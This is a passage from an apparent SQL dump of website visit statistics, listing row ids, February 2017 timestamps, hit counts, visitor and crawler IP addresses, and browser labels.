6.211.24.96','other'),(88883,1487366426,1,1,0,0,'157.55.39.250','other'),(88884,1487366661,1,0,1,0,'66.249.64.183',''),(88885,1487368200,1,1,0,0,'217.69.133.229','other'),(88886,1487369987,1,0,1,0,'68.180.229.99',''),(88887,1487371778,1,1,0,0,'66.249.64.59','chrome'),(88888,1487371819,1,0,1,0,'66.249.64.61',''),(88889,1487374176,1,0,1,0,'68.180.229.99',''),(88890,1487374643,1,1,0,0,'157.55.39.250','other'),(88891,1487374714,1,1,0,0,'176.14.188.120','msie'),(88892,1487375907,1,1,0,0,'157.55.39.56','other'),(88893,1487376616,1,1,0,0,'66.249.64.183','chrome'),(88894,1487377111,1,1,0,0,'66.249.64.57','chrome'),(88895,1487378084,1,1,0,0,'91.196.178.163','chrome'),(88896,1487383752,1,0,1,0,'68.180.229.99',''),(88897,1487386291,1,0,1,0,'66.249.64.179',''),(88898,1487393894,1,0,1,0,'66.249.64.183',''),(88899,1487393983,1,0,1,0,'66.249.64.179',''),(88900,1487395444,1,0,1,0,'66.249.64.61',''),(88901,1487397048,1,1,0,0,'157.55.39.56','other'),(88902,1487399368,1,0,1,0,'66.249.64.183',''),(88903,1487399506,1,0,1,0,'68.180.230.114',''),(88904,1487399525,1,1,0,0,'157.55.39.56','other'),(88905,1487399984,2,2,0,0,'95.213.141.126','opera'),(88906,1487401209,1,1,0,0,'91.196.178.99','chrome'),(88907,1487401585,1,1,0,0,'66.102.9.27','chrome'),(88908,1487401841,1,1,0,0,'207.46.13.172','other'),(88909,1487402022,1,0,1,0,'68.180.229.99',''),(88910,1487402990,2,2,0,0,'157.55.39.56','other'),(88911,1487402991,1,1,0,0,'157.55.39.250','other'),(88912,1487402995,1,1,0,0,'207.46.13.172','other'),(88913,1487403793,1,1,0,0,'176.109.195.130','other'),(88914,1487404103,1,1,0,0,'217.69.133.69','other'),(88915,1487405047,1,1,0,0,'195.154.146.17','other'),(88916,1487406716,1,0,1,0,'68.180.229.99',''),(88917,1487408062,1,0,1,0,'66.249.64.187',''),(88918,1487409131,1,0,1,0,'66.249.64.183',''),(88919,1487410432,1,0,1,0,'68.180.230.114',''),(88920,1487412518,1,1,0,0,'91.196.178.66','chrome'),(88921,1487415301,1,1,0,0,'180.76.15.148','other'),(88922,1487420223,1,0,1,0,'66.249.64.179',''),(88923,1487421059,1,1,0,0,'66.249.64.187','chrome'),(88924,1487421767,1,0,1,0,'66.249.64.59',''),(88925,1487425895,2,2,0,0,'130.193.50.34','other'),(88926,1487426581,1,0,1,0,'66.249.64.183',''),(88927,1487427458,1,0,1,0,'66.249.64.59',''),(88928,1487428008,1,1,0,0,'91.196.178.132','firefox'),(88929,1487428369,1,1,0,0,'141.8.142.175','other'),(88930,1487429789,1,0,1,0,'66.249.64.179',''),(88931,1487429968,1,1,0,0,'130.193.50.34','other'),(88932,1487430345,1,1,0,0,'91.196.178.36','chrome'),(88933,1487431169,1,1,0,0,'66.249.64.59','chrome'),(88934,1487432472,1,1,0,0,'63.243.252.114','other'),(88935,1487432696,1,0,1,0,'68.180.229.99',''),(88936,1487433386,1,1,0,0,'66.249.69.52','chrome'),(88937,1487434506,1,0,1,0,'66.249.75.28',''),(88938,1487434830,1,1,0,0,'207.46.13.59','other'),(88939,1487435151,1,0,1,0,'66.249.69.60',''),(88940,1487439172,1,0,1,0,'66.249.69.60',''),(88941,1487440096,1,1,0,0,'66.249.93.156','chrome'),(88942,1487441867,1,0,1,0,'68.180.229.99',''),(88943,1487443030,2,0,2,0,'66.249.69.60',''),(88944,1487443968,1,0,1,0,'66.249.75.28',''),(88945,1487445427,1,0,1,0,'68.180.230.114',''),(88946,1487445708,4,4,0,0,'69.30.213.202','other'),(88947,1487446506,1,1,0,0,'178.94.172.146','chrome'),(88948,1487448464,1,1,0,0,'193.194.127.217','firefox'),(88949,1487448487,1,0,1,0,'66.249.69.56',''),(88950,1487449011,1,1,0,0,'204.12.208.10','other'),(88951,1487449415,1,1,0,0,'37.55.150.87','chrome'),(88952,1487449443,1,1,0,0,'130.193.50.34','other'),(88953,1487450662,1,1,0,0,'91.196.178.66','chrome'),(88954,1487455401,1,0,1,0,'66.249.69.60',''),(88955,1487458552,1,1,0,0,'188.32.129.128','chrome'),(88956,1487459111,1,1,0,0,'207.46.13.59','other'),(88957,1487459229,1,0,1,0,'66.249.69.52',''),(88958,1487460840,1,1,0,0,'207.46.13.59','other'),(88959,1487461373,1,1,0,0,'217.69.133.233','other'),(88960,1487462512,1,1,0,0,'95.28.55.14','firefox'),(88961,1487463280,1,1,0,0,'207.46.13.40','other'),(88962,1487463840,1,0,1,0,'66.249.69.60',''),(88963,1487464803,1,1,0,0,'84.3.172.165','other'),(88964,1487466003,1,1,0,0,'207.46.13.59','other'),(88965,1487467639,2,2,0,0,'207.46.13.172','other'),(88966,1487468605,1,0,1,0,'66.249.69.52',''),(88967,1487472085,1,1,0,0,'66.249.75.25','chrome'),(88968,1487472145,1,0,1,0,'66.249.69.60',''),(88969,1487474558,1,0,1,0,'66.249.69.52',''),(88970,1487474611,1,1,0,0,'64.246.165.160','firefox'),(88971,1487474815,1,1,0,0,'180.76.15.139','other'),(88972,1487475965,1,1,0,0,'207.46.13.59','other'),(88973,1487476835,1,1,0,0,'180.76.15.9','other'),(88974,1487481785,1,1,0,0,'46.229.168.73','other'),(88975,1487481803,1,1,0,0,'46.229.168.74','other'),(88976,1487481813,3,3,0,0,'46.229.168.66','other'),(88977,1487481831,1,1,0,0,'46.229.168.70','other'),(88978,1487481872,1,1,0,0,'46.229.168.72','other'),(88979,1487481904,1,1,0,0,'46.229.168.69','other'),(88980,1487481921,1,1,0,0,'46.229.168.75','other'),(88981,1487481974,1,1,0,0,'66.249.69.60','chrome'),(88982,1487482666,1,0,1,0,'68.180.230.114',''),(88983,1487483838,1,0,1,0,'66.249.69.56',''),(88984,1487483987,1,0,1,0,'66.249.75.28',''),(88985,1487487548,1,1,0,0,'95.158.48.206','other'),(88986,1487490841,2,2,0,0,'157.55.39.250','other'),(88987,1487491217,1,1,0,0,'207.46.13.172','other'),(88988,1487491370,1,0,1,0,'66.249.69.56',''),(88989,1487492210,1,1,0,0,'37.55.151.183','chrome'),(88990,1487492240,1,1,0,0,'130.193.50.34','other'),(88991,1487492360,1,1,0,0,'91.196.178.34','chrome'),(88992,1487493498,1,1,0,0,'207.46.13.40','other'),(88993,1487495851,1,1,0,0,'62.80.185.138','chrome'),(88994,1487496270,1,1,0,0,'66.249.69.60','chrome'),(88995,1487496410,1,1,0,0,'207.46.13.172','other'),(88996,1487496614,1,1,0,0,'180.76.15.163','other'),(88997,1487497105,1,1,0,0,'62.80.185.138','chrome'),(88998,1487499133,1,0,1,0,'66.249.69.60',''),(88999,1487499769,1,0,1,0,'66.249.69.52',''),(89000,1487500050,1,1,0,0,'62.80.185.138','chrome'),(89001,1487500065,1,1,0,0,'78.111.185.230','chrome'),(89002,1487500333,1,0,1,0,'66.249.75.28',''),(89003,1487501547,1,0,1,0,'207.46.13.172',''),(89004,1487502514,1,1,0,0,'46.133.242.67','other'),(89005,1487502868,1,1,0,0,'66.102.9.27','chrome'),(89006,1487503438,1,1,0,0,'66.249.75.22','chrome'),(89007,1487504103,1,1,0,0,'157.55.39.250','other'),(89008,1487504163,1,1,0,0,'130.180.216.234','other'),(89009,1487504839,1,0,1,0,'66.249.69.60',''),(89010,1487505197,1,0,1,0,'66.249.75.25',''),(89011,1487507186,1,1,0,0,'207.46.13.40','other'),(89012,1487507618,1,0,1,0,'66.249.75.28',''),(89013,1487508359,1,0,1,0,'68.180.230.114',''),(89014,1487510072,1,1,0,0,'66.249.75.25','chrome'),(89015,1487510460,1,1,0,0,'92.113.175.221','firefox'),(89016,1487510491,1,1,0,0,'130.180.220.124','chrome'),(89017,1487510815,1,1,0,0,'37.52.188.191','chrome'),(89018,1487510872,1,1,0,0,'130.193.50.34','other'),(89019,1487511819,1,0,1,0,'66.249.69.60',''),(89020,1487511941,2,0,2,0,'66.249.69.52',''),(89021,1487512494,1,0,1,0,'66.249.75.25',''),(89022,1487512841,1,0,1,0,'66.249.75.28',''),(89023,1487512915,2,0,2,0,'68.180.229.99',''),(89024,1487513414,1,1,0,0,'130.180.220.124','chrome'),(89025,1487513603,1,1,0,0,'141.8.183.25','other'),(89026,1487513628,1,0,1,0,'66.249.69.52',''),(89027,1487513886,1,1,0,0,'180.76.15.156','other'),(89028,1487514016,1,0,1,0,'68.180.229.99',''),(89029,1487516409,1,0,1,0,'66.249.75.25',''),(89030,1487516474,1,0,1,0,'66.249.69.60',''),(89031,1487517793,1,1,0,0,'91.196.178.129','chrome'),(89032,1487519008,1,0,1,0,'66.249.64.61',''),(89033,1487520482,4,4,0,0,'95.10.179.173','other'),(89034,1487520487,1,0,1,0,'66.249.64.183',''),(89035,1487521504,1,1,0,0,'176.104.91.122','msie'),(89036,1487522443,1,0,1,0,'66.249.64.179',''),(89037,1487522575,1,0,1,0,'66.249.64.183',''),(89038,1487522808,1,0,1,0,'66.249.64.57',''),(89039,1487523877,1,0,1,0,'66.249.64.59',''),(89040,1487524574,1,1,0,0,'66.249.64.61','chrome'),(89041,1487524993,1,0,1,0,'66.249.64.183',''),(89042,1487526439,1,0,1,0,'66.249.64.61',''),(89043,1487526871,3,3,0,0,'46.5.62.55','other'),(89044,1487527629,1,1,0,0,'66.249.64.61','chrome'),(89045,1487528601,1,0,1,0,'66.249.64.57',''),(89046,1487531199,1,1,0,0,'94.179.47.85','chrome'),(89047,1487532268,1,0,1,0,'66.249.64.57',''),(89048,1487532274,2,0,2,0,'66.249.64.187',''),(89049,1487532795,2,2,0,0,'157.55.39.250','other'),(89050,1487533457,1,1,0,0,'168.235.197.128','other'),(89051,1487533845,1,1,0,0,'207.46.13.172','other'),(89052,1487535102,1,0,1,0,'66.249.64.57',''),(89053,1487535277,1,0,1,0,'66.249.64.183',''),(89054,1487539691,1,0,1,0,'68.180.229.99',''),(89055,1487540258,2,0,2,0,'66.249.64.183',''),(89056,1487541310,1,1,0,0,'130.193.50.34','other'),(89057,1487541313,1,1,0,0,'141.8.142.175','other'),(89058,1487541506,2,2,0,0,'141.8.142.15','other'),(89059,1487542305,1,0,1,0,'68.180.230.114',''),(89060,1487546853,1,1,0,0,'130.193.50.34','other'),(89061,1487552417,1,1,0,0,'207.46.13.40','other'),(89062,1487554256,1,1,0,0,'66.249.64.179','chrome'),(89063,1487556777,1,0,1,0,'66.249.64.183',''),(89064,1487562474,1,1,0,0,'207.46.13.59','other'),(89065,1487563745,1,1,0,0,'189.32.165.220','firefox'),(89066,1487565981,1,0,1,0,'66.249.64.59',''),(89067,1487566502,1,0,1,0,'66.249.64.61',''),(89068,1487566931,1,0,1,0,'66.249.64.187',''),(89069,1487569858,1,1,0,0,'91.196.178.69','firefox'),(89070,1487571333,1,1,0,0,'91.196.178.72','firefox'),(89071,1487571477,1,1,0,0,'91.196.178.66','chrome'),(89072,1487571583,1,1,0,0,'207.46.13.40','other'),(89073,1487572300,1,1,0,0,'91.196.178.72','firefox'),(89074,1487572798,1,1,0,0,'157.55.39.250','other'),(89075,1487572799,1,1,0,0,'91.196.178.70','chrome'),(89076,1487573350,1,1,0,0,'46.63.119.219','chrome'),(89077,1487573427,1,1,0,0,'207.46.13.40','other'),(89078,1487573901,1,1,0,0,'37.52.23.154','chrome'),(89079,1487574302,1,1,0,0,'91.196.178.72','firefox'),(89080,1487574638,1,1,0,0,'91.196.178.33','chrome'),(89081,1487574716,1,1,0,0,'91.196.178.70','chrome'),(89082,1487575017,1,1,0,0,'91.196.177.46','firefox'),(89083,1487575138,1,1,0,0,'91.196.178.71','chrome'),(89084,1487575608,1,1,0,0,'130.180.218.52','firefox'),(89085,1487575616,1,1,0,0,'207.46.13.172','other'),(89086,1487575811,1,1,0,0,'157.55.39.250','other'),(89087,1487576231,1,1,0,0,'91.196.178.72','firefox'),(89088,1487576341,1,0,1,0,'66.249.64.59',''),(89089,1487576392,1,1,0,0,'91.196.178.66','other'),(89090,1487576568,1,1,0,0,'46.200.122.40','chrome'),(89091,1487576805,1,1,0,0,'91.196.178.71','chrome'),(89092,1487577879,1,1,0,0,'91.196.178.69','firefox'),(89093,1487578038,1,1,0,0,'91.196.178.132','firefox'),(89094,1487578948,1,1,0,0,'95.133.44.229','chrome'),(89095,1487579043,1,1,0,0,'178.95.70.143','chrome'),(89096,1487580545,1,1,0,0,'89.21.95.66','firefox'),(89097,1487580606,2,2,0,0,'130.193.51.19','other'),(89098,1487580927,1,1,0,0,'91.196.178.72','firefox'),(89099,1487581192,1,1,0,0,'130.193.50.34','other'),(89100,1487581205,1,1,0,0,'141.8.183.25','other'),(89101,1487581555,1,0,1,0,'66.249.64.183',''),(89102,1487581885,1,1,0,0,'91.196.178.99','chrome'),(89103,1487582311,1,1,0,0,'91.196.177.46','firefox'),(89104,1487582711,2,2,0,0,'193.108.50.39','chrome'),(89105,1487582936,1,1,0,0,'176.122.108.202','chrome'),(89106,1487582953,1,1,0,0,'95.134.30.152','firefox'),(89107,1487582963,1,1,0,0,'130.193.50.34','other'),(89108,1487583198,1,0,1,0,'68.180.229.99',''),(89109,1487583380,1,1,0,0,'91.196.178.163','chrome'),(89110,1487583833,1,1,0,0,'46.164.130.92','firefox'),(89111,1487583945,1,1,0,0,'93.74.212.147','firefox'),(89112,1487584075,1,1,0,0,'77.52.180.238','chrome'),(89113,1487584690,1,1,0,0,'180.76.15.14','other'),(89114,1487584761,1,1,0,0,'207.46.13.172','other'),(89115,1487584826,1,1,0,0,'46.133.126.213','firefox'),(89116,1487584895,1,1,0,0,'193.194.127.217','firefox'),(89117,1487584973,1,1,0,0,'141.8.142.15','other'),(89118,1487584974,1,1,0,0,'5.255.253.39','other'),(89119,1487585524,1,1,0,0,'91.196.178.72','firefox'),(89120,1487585797,1,1,0,0,'178.92.72.110','firefox'),(89121,1487585919,1,1,0,0,'178.95.214.218','chrome'),(89122,1487585965,1,1,0,0,'91.196.178.163','chrome'),(89123,1487586447,1,1,0,0,'91.196.178.70','firefox'),(89124,1487586454,1,1,0,0,'46.133.126.213','firefox'),(89125,1487587143,1,1,0,0,'180.76.15.22','other'),(89126,1487587281,1,1,0,0,'91.196.178.66','other'),(89127,1487587385,1,1,0,0,'46.133.126.213','firefox'),(89128,1487587906,2,2,0,0,'195.10.210.49','chrome'),(89129,1487587950,1,1,0,0,'178.93.247.188','firefox'),(89130,1487588008,1,1,0,0,'180.76.15.136','other'),(89131,1487588091,1,1,0,0,'193.39.69.37','chrome'),(89132,1487588356,1,1,0,0,'78.111.185.205','chrome'),(89133,1487589399,1,1,0,0,'141.8.183.25','other'),(89134,1487589671,1,1,0,0,'130.193.50.34','other'),(89135,1487590094,1,1,0,0,'37.52.148.164','firefox'),(89136,1487590185,2,2,0,0,'91.196.178.39','firefox'),(89137,1487590518,1,1,0,0,'207.46.13.172','other'),(89138,1487590666,1,1,0,0,'52.86.176.3','other'),(89139,1487591118,1,1,0,0,'195.10.210.49','chrome'),(89140,1487591809,1,1,0,0,'66.249.64.57','chrome'),(89141,1487591879,1,1,0,0,'46.133.126.213','firefox'),(89142,1487591944,1,0,1,0,'66.249.64.183',''),(89143,1487592012,2,2,0,0,'141.8.142.175','other'),(89144,1487592028,1,1,0,0,'130.193.50.34','other'),(89145,1487592974,1,1,0,0,'141.8.183.25','other'),(89146,1487593356,1,1,0,0,'91.196.178.69','firefox'),(89147,1487593927,3,3,0,0,'141.8.142.175','other'),(89148,1487593945,1,1,0,0,'94.179.117.110','firefox'),(89149,1487594177,1,1,0,0,'176.118.55.252','chrome'),(89150,1487594339,2,2,0,0,'130.193.50.34','other'),(89151,1487594344,2,2,0,0,'130.193.51.19','other'),(89152,1487594353,1,1,0,0,'141.8.183.25','other'),(89153,1487594357,1,1,0,0,'141.8.142.58','other'),(89154,1487594374,1,1,0,0,'141.8.142.67','other'),(89155,1487594477,2,2,0,0,'91.196.178.69','firefox'),(89156,1487594999,1,1,0,0,'91.196.178.132','firefox'),(89157,1487595038,1,1,0,0,'207.46.13.172','other'),(89158,1487595106,1,1,0,0,'91.196.178.66','other'),(89159,1487595215,2,2,0,0,'91.196.177.26','chrome'),(89160,1487595246,1,1,0,0,'91.196.178.72','firefox'),(89161,1487595484,1,1,0,0,'46.164.130.92','firefox'),(89162,1487595815,1,1,0,0,'91.196.178.66','firefox'),(89163,1487597139,2,2,0,0,'91.196.178.66','firefox'),(89164,1487597299,1,1,0,0,'91.209.214.11','chrome'),(89165,1487597515,1,1,0,0,'92.113.73.119','chrome'),(89166,1487597660,1,1,0,0,'40.77.167.114','other'),(89167,1487597715,1,1,0,0,'91.196.178.72','firefox'),(89168,1487597960,1,1,0,0,'94.178.117.186','chrome'),(89169,1487598020,1,0,1,0,'66.249.64.187',''),(89170,1487598171,1,0,1,0,'207.46.13.172',''),(89171,1487598354,3,3,0,0,'91.196.177.15','chrome'),(89172,1487598367,1,1,0,0,'91.237.107.150','chrome'),(89173,1487599617,1,1,0,0,'134.249.176.19','chrome'),(89174,1487599777,1,1,0,0,'94.179.7.159','firefox'),(89175,1487599804,1,1,0,0,'78.111.185.178','chrome'),(89176,1487600745,1,0,1,0,'66.249.64.61',''),(89177,1487600841,1,1,0,0,'91.196.177.46','firefox'),(89178,1487600957,1,0,1,0,'66.249.64.187',''),(89179,1487601103,1,1,0,0,'91.196.178.72','firefox'),(89180,1487601565,1,1,0,0,'91.196.177.15','chrome'),(89181,1487601863,1,1,0,0,'46.133.126.213','firefox'),(89182,1487602172,1,1,0,0,'91.196.178.163','chrome'),(89183,1487603226,1,1,0,0,'91.196.177.15','chrome'),(89184,1487603647,1,1,0,0,'91.196.178.66','chrome'),(89185,1487603775,1,1,0,0,'91.196.178.66','other'),(89186,1487604526,1,1,0,0,'157.55.39.250','other'),(89187,1487604730,1,1,0,0,'180.76.15.150','other'),(89188,1487606324,1,1,0,0,'141.8.142.206','other'),(89189,1487606349,1,1,0,0,'141.8.132.2','other'),(89190,1487607067,1,0,1,0,'66.249.64.187',''),(89191,1487607810,1,1,0,0,'207.46.13.172','other'),(89192,1487609618,1,1,0,0,'94.27.58.206','chrome'),(89193,1487610967,2,2,0,0,'149.202.247.161','other'),(89195,1487611738,1,1,0,0,'162.210.196.98','other'),(89196,1487613357,1,1,0,0,'91.196.178.40','firefox'),(89197,1487613777,1,1,0,0,'91.196.178.66','firefox'),(89198,1487614876,228,228,0,0,'84.3.172.165','other'),(89199,1487615386,1,1,0,0,'46.219.249.98','chrome'),(89200,1487615892,1,1,0,0,'91.196.178.168','chrome'),(89201,1487618003,1,1,0,0,'180.76.15.10','other'),(89202,1487619666,1,1,0,0,'95.24.120.24','msie'),(89203,1487621177,1,1,0,0,'94.179.31.148','firefox'),(89204,1487621854,1,1,0,0,'176.195.109.220','msie'),(89205,1487622410,1,1,0,0,'46.211.156.87','other'),(89206,1487622669,1,0,1,0,'66.249.75.25',''),(89207,1487622710,1,0,1,0,'66.249.69.56',''),(89208,1487623286,1,1,0,0,'128.68.53.76','msie'),(89209,1487623807,1,0,1,0,'207.46.13.59',''),(89210,1487623838,1,1,0,0,'46.211.2.243','other'),(89211,1487625041,1,1,0,0,'80.64.173.162','other'),(89212,1487625770,1,0,1,0,'66.249.69.52',''),(89213,1487628761,3,3,0,0,'80.64.173.162','other'),(89214,1487631544,1,0,1,0,'66.249.75.28',''),(89215,1487633335,1,0,1,0,'68.180.229.99',''),(89216,1487634028,1,0,1,0,'66.249.69.52',''),(89217,1487637055,1,1,0,0,'157.55.39.250','other'),(89218,1487638367,1,1,0,0,'157.55.39.250','other'),(89219,1487639695,1,1,0,0,'130.193.50.34','other'),(89220,1487640855,1,1,0,0,'66.249.69.56','chrome'),(89221,1487645035,7,7,0,0,'130.193.50.34','other'),(89222,1487651894,1,0,1,0,'207.46.13.172',''),(89223,1487656305,1,1,0,0,'176.109.201.15','firefox'),(89224,1487656339,1,1,0,0,'130.193.51.19','other'),(89225,1487657049,1,1,0,0,'66.102.9.25','chrome'),(89226,1487657865,1,1,0,0,'91.196.178.70','chrome'),(89227,1487657891,1,1,0,0,'130.193.51.19','other'),(89228,1487658838,1,1,0,0,'91.196.178.66','chrome'),(89229,1487659204,1,1,0,0,'37.52.23.154','chrome'),(89230,1487659264,1,1,0,0,'66.102.9.27','chrome'),(89231,1487659560,1,0,1,0,'68.180.230.114',''),(89232,1487659971,1,1,0,0,'91.196.178.68','firefox'),(89233,1487660231,1,1,0,0,'94.179.190.29','chrome'),(89234,1487662012,1,0,1,0,'66.249.75.25',''),(89235,1487662475,1,1,0,0,'46.165.197.141','other'),(89236,1487662620,1,1,0,0,'66.249.75.28','chrome'),(89237,1487662838,1,1,0,0,'91.196.178.70','firefox'),(89238,1487663897,1,1,0,0,'91.196.178.133','firefox'),(89239,1487663957,1,1,0,0,'157.55.39.250','other'),(89240,1487664286,1,0,1,0,'66.249.69.52',''),(89241,1487664790,1,1,0,0,'91.196.178.70','firefox'),(89242,1487665215,2,2,0,0,'37.54.170.146','chrome'),(89243,1487665534,1,1,0,0,'91.196.178.71','chrome'),(89244,1487666800,1,1,0,0,'91.196.178.71','chrome'),(89245,1487667249,1,1,0,0,'91.196.178.168','chrome'),(89246,1487667306,1,0,1,0,'66.249.75.28',''),(89247,1487667617,1,1,0,0,'130.180.217.43','chrome'),(89248,1487667671,1,0,1,0,'66.249.75.25',''),(89249,1487668073,1,1,0,0,'91.196.178.68','firefox'),(89250,1487668485,1,1,0,0,'91.196.178.68','chrome'),(89251,1487669058,1,1,0,0,'178.54.190.249','chrome'),(89252,1487669611,1,1,0,0,'207.46.13.59','other'),(89253,1487669956,1,1,0,0,'91.196.177.46','chrome'),(89254,1487670002,1,1,0,0,'91.196.177.26','chrome'),(89255,1487670329,2,2,0,0,'208.80.155.178','other'),(89256,1487670361,1,1,0,0,'91.228.58.234','chrome'),(89257,1487670652,1,1,0,0,'91.196.178.168','chrome'),(89258,1487670846,1,1,0,0,'91.196.178.72','firefox'),(89259,1487671252,1,1,0,0,'91.196.178.68','chrome'),(89260,1487671366,1,1,0,0,'107.23.92.82','firefox'),(89261,1487671522,1,1,0,0,'66.102.9.38','chrome'),(89262,1487671910,2,2,0,0,'95.135.90.100','chrome'),(89263,1487672734,1,1,0,0,'157.55.39.250','other'),(89264,1487672902,1,1,0,0,'91.196.178.70','chrome'),(89265,1487673443,1,0,1,0,'207.46.13.172',''),(89266,1487674197,2,2,0,0,'80.254.155.43','chrome'),(89267,1487674267,1,1,0,0,'91.196.178.72','firefox'),(89268,1487674832,1,1,0,0,'91.196.178.39','firefox'),(89269,1487674963,1,0,1,0,'66.249.75.28',''),(89270,1487675046,1,1,0,0,'178.140.235.174','msie'),(89271,1487675173,1,1,0,0,'91.196.178.68','chrome'),(89272,1487675547,1,0,1,0,'66.249.69.56',''),(89273,1487675899,1,1,0,0,'130.180.217.240','firefox'),(89274,1487676121,1,1,0,0,'37.53.89.22','chrome'),(89275,1487676376,1,1,0,0,'91.196.178.168','chrome'),(89276,1487676402,1,1,0,0,'91.196.178.70','firefox'),(89277,1487677851,1,1,0,0,'91.196.178.135','chrome'),(89278,1487678021,1,0,1,0,'66.249.75.28',''),(89279,1487678314,1,1,0,0,'195.10.210.49','chrome'),(89280,1487678740,1,1,0,0,'91.196.178.40','chrome'),(89281,1487678759,1,1,0,0,'31.41.107.108','chrome'),(89282,1487679492,1,1,0,0,'91.196.178.72','firefox'),(89283,1487679516,1,1,0,0,'130.193.50.34','other'),(89284,1487679750,1,1,0,0,'46.201.227.188','chrome'),(89285,1487679760,1,1,0,0,'141.8.183.25','other'),(89286,1487679767,1,1,0,0,'141.8.142.61','other'),(89287,1487679817,1,0,1,0,'66.249.69.56',''),(89288,1487680016,1,1,0,0,'91.196.177.46','chrome'),(89289,1487680277,1,1,0,0,'94.178.147.116','firefox'),(89290,1487681569,1,1,0,0,'85.115.58.180','other'),(89291,1487681721,1,1,0,0,'91.196.178.72','firefox'),(89292,1487683247,1,1,0,0,'37.55.0.127','chrome'),(89293,1487683300,1,1,0,0,'37.52.17.158','chrome'),(89294,1487684203,1,1,0,0,'91.196.178.66','other'),(89295,1487684347,1,1,0,0,'130.193.50.34','other'),(89296,1487684353,1,1,0,0,'141.8.142.175','other'),(89297,1487684414,1,1,0,0,'82.207.46.80','opera'),(89298,1487684560,1,0,1,0,'66.249.69.52',''),(89299,1487684731,1,1,0,0,'128.72.237.194','msie'),(89300,1487685028,1,1,0,0,'95.135.90.100','chrome'),(89301,1487685464,1,1,0,0,'91.196.178.135','chrome'),(89302,1487685740,1,1,0,0,'180.76.15.23','other'),(89303,1487687558,1,1,0,0,'37.52.23.154','chrome'),(89304,1487687792,1,1,0,0,'195.154.181.162','chrome'),(89305,1487688443,1,0,1,0,'66.249.69.52',''),(89306,1487689129,1,0,1,0,'66.249.69.56',''),(89307,1487689301,1,1,0,0,'66.249.69.52','chrome'),(89308,1487690303,1,1,0,0,'91.196.177.15','chrome'),(89309,1487690336,1,1,0,0,'66.249.93.156','chrome'),(89310,1487691584,2,0,2,0,'66.249.69.52',''),(89311,1487693247,1,1,0,0,'37.73.240.8','chrome'),(89312,1487693480,1,1,0,0,'193.194.127.217','firefox'),(89313,1487694179,1,1,0,0,'163.172.64.183','other'),(89314,1487695181,1,1,0,0,'66.249.75.28','chrome'),(89315,1487696504,1,0,1,0,'66.249.69.60',''),(89316,1487696808,1,1,0,0,'91.196.178.166','chrome'),(89317,1487697598,1,1,0,0,'51.255.65.8','other'),(89318,1487697665,1,1,0,0,'164.132.161.15','other'),(89319,1487697689,1,1,0,0,'157.55.39.250','other'),(89320,1487698502,1,1,0,0,'178.216.188.105','chrome'),(89321,1487698514,1,1,0,0,'5.255.253.67','other'),(89322,1487699032,1,0,1,0,'66.249.69.60',''),(89323,1487699191,10,10,0,0,'69.58.178.58','other'),(89324,1487699221,1,1,0,0,'91.196.178.37','chrome'),(89325,1487699814,1,1,0,0,'51.255.65.48','other'),(89326,1487700401,1,0,1,0,'66.249.69.60',''),(89327,1487700503,1,1,0,0,'92.113.1.216','chrome'),(89328,1487701232,1,1,0,0,'164.132.161.81','other'),(89329,1487701537,1,0,1,0,'66.249.75.16',''),(89330,1487701982,1,0,1,0,'66.249.69.52',''),(89331,1487702153,1,1,0,0,'66.249.69.60','chrome'),(89332,1487702179,1,1,0,0,'164.132.161.42','other'),(89333,1487702592,1,1,0,0,'207.46.13.59','other'),(89334,1487702730,1,1,0,0,'164.132.161.91','other'),(89335,1487703348,1,0,1,0,'66.249.75.16',''),(89336,1487703532,1,0,1,0,'66.249.69.56',''),(89337,1487704055,1,1,0,0,'66.249.75.28','chrome'),(89338,1487704715,1,1,0,0,'178.92.75.100','firefox'),(89339,1487704906,1,0,1,0,'66.249.75.22',''),(89340,1487705143,1,1,0,0,'51.255.65.9','other'),(89341,1487705251,1,1,0,0,'40.77.167.114','other'),(89342,1487705615,1,0,1,0,'66.249.69.60',''),(89343,1487705809,4,4,0,0,'95.10.24.179','other'),(89344,1487706205,2,0,2,0,'66.249.69.56',''),(89345,1487706679,1,1,0,0,'51.255.65.10','other'),(89346,1487706868,1,1,0,0,'91.211.132.38','opera'),(89347,1487706883,1,1,0,0,'141.8.132.52','other'),(89348,1487708272,2,0,2,0,'66.249.69.56',''),(89349,1487709805,1,1,0,0,'164.132.161.30','other'),(89350,1487709821,1,1,0,0,'66.249.75.28','chrome'),(89351,1487710433,1,1,0,0,'163.172.64.182','other'),(89352,1487710734,1,1,0,0,'164.132.161.20','other'),(89353,1487710742,1,1,0,0,'163.172.64.177','other'),(89354,1487711046,1,1,0,0,'212.90.63.137','chrome'),(89355,1487711875,1,1,0,0,'164.132.161.68','other'),(89356,1487711945,1,0,1,0,'66.249.69.60',''),(89357,1487711972,1,0,1,0,'66.249.69.52',''),(89358,1487712324,1,1,0,0,'163.172.64.247','other'),(89359,1487712345,1,0,1,0,'66.249.69.56',''),(89360,1487712960,1,1,0,0,'163.172.64.182','other'),(89361,1487713344,1,1,0,0,'66.249.75.22','chrome'),(89362,1487713590,1,1,0,0,'164.132.161.56','other'),(89363,1487713796,1,1,0,0,'157.55.39.250','other'),(89364,1487714414,1,1,0,0,'164.132.161.48','other'),(89365,1487715493,1,1,0,0,'51.255.65.11','other'),(89366,1487716031,1,1,0,0,'51.255.65.55','other'),(89367,1487716110,1,1,0,0,'157.55.39.250','other'),(89368,1487716741,1,0,1,0,'66.249.69.52',''),(89369,1487716802,1,1,0,0,'51.255.65.46','other'),(89370,1487717677,1,1,0,0,'164.132.161.92','other'),(89371,1487717753,1,1,0,0,'157.55.39.250','other'),(89372,1487718061,1,0,1,0,'66.249.69.52',''),(89373,1487718067,2,0,2,0,'66.249.75.22',''),(89374,1487718327,1,1,0,0,'164.132.161.84','other'),(89375,1487719384,1,0,1,0,'66.249.69.52',''),(89376,1487719509,1,1,0,0,'163.172.64.248','other'),(89377,1487719526,1,0,1,0,'66.249.75.22',''),(89378,1487719542,1,1,0,0,'164.132.161.16','other'),(89379,1487719786,1,1,0,0,'164.132.161.7','other'),(89380,1487720354,1,1,0,0,'51.255.65.67','other'),(89381,1487721122,1,1,0,0,'51.255.65.94','other'),(89382,1487721339,1,1,0,0,'207.46.13.59','other'),(89383,1487722423,1,1,0,0,'40.77.167.114','other'),(89384,1487722447,1,1,0,0,'51.255.65.20','other'),(89385,1487722583,1,1,0,0,'163.172.64.251','other'),(89386,1487723510,1,1,0,0,'164.132.161.2','other'),(89387,1487724520,1,1,0,0,'164.132.161.2','other'),(89388,1487724924,1,1,0,0,'51.255.65.51','other'),(89389,1487725024,1,1,0,0,'163.172.64.246','other'),(89390,1487725777,1,1,0,0,'180.76.15.135','other'),(89391,1487726724,1,1,0,0,